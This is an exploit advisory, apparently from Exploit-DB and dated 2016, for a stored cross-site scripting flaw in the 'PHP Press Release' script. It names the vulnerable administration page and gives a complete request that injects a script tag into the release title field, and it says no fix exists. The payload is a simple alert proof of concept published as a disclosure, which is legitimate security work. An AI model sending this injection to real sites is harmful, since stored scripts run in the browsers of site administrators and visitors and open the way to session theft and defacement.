PHP Press Release - Stored Cross Site Scripting

2016-10-09 04:05:02

# Exploit Title : PHP Press Release* - Stored Cross Site
Scripting*
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
# Software link :
http://www.pagereactions.com/downloads/phppressrelease.zip


Description :

Vulnerable link :
http://site_name/phppressrelease/administration.php?pageaction=newrelease

Stored XSS Payload :

http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active

Fixes

No fixes

In order to submit a new fix you need to be registered.